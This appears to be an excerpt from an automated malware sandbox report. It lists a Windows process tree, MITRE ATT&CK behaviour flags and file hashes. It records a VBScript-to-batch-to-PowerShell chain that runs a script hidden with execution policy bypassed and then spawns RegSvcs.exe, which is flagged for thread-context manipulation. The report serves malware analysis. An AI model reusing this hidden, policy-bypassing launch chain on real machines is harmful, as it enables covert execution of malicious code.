    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d744718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 5992, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 5984, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 5844, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 3460, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 3660, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 5532, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 6120, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  [PID 2764, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2928 /prefetch:8
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  [PID 5020, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2928 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 4724, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 5068, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 2228, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 2452, tree depth 2]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe  [PID 5852, tree depth 1]
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe  [PID 5368, tree depth 1]
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\WScript.exe  [PID 5420, tree depth 1]
  Command line: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
  - Checks computer location settings
  C:\Windows\system32\cmd.exe  [PID 3880, tree depth 2]
    Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
    C:\Windows\system32\cmd.exe  [PID 876, tree depth 3]
      Command line: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4692, tree depth 4]
        Command line: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  [PID 1600, tree depth 5]
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  [PID 5352, tree depth 5]
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          - System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
11KB
MD52dbcea9e4a53c279835d9aed2aa58071
SHA11db4778fb43210cb4c0211cd2fcecac81083a6be
SHA25629a51bb118659837c8b5bf131d253776da7effec43dc912d9e8b182bb06f8546
SHA512d6edc25b7359739e48ece1d1d64703a6c39a9a51e63baf308fa38b5b7929d24daa84c53b9d48ebe10ef6c7eb7f763e939e5119433fe07cf376357a641a8eac9e
-
Filesize
10KB
MD53837cc20ad58285cdad0f3d7df5a2c7f
SHA143524ebc985b7038b2d8700ff79f430df24607e4
SHA2562c7a5f6c9f84198e604c05fdfbe4b54ad0cb034175893f4388a7fa0ad30de7be
SHA512bb93b129a3a2fe7f751192d24f755bee9452923b657162727b4c4175acc8579e8dcee3ddd372c834aa8d7ba7d551529f3b7f81d585f3dc098844415f8ac0de5c
-
Filesize
978KB
MD5f6e37f2a221fbca748053e8a46c3ef9f
SHA192f1a5d8aad5bc421b803a6048a8ce0bbee0c953
SHA256ecdea80099e541809e0ecb95f993123974f8722ad4bb2b2bdc6b489ca02aaabd
SHA5123c94e63bef99ab0d1cebe8f41b737b082600f1b2f1e723d134f1a400fe9f8dea0a75b263e3f7d5fa03bb8e4c9f84c3b567567b3026c5d5cf236e3c00fdb3f272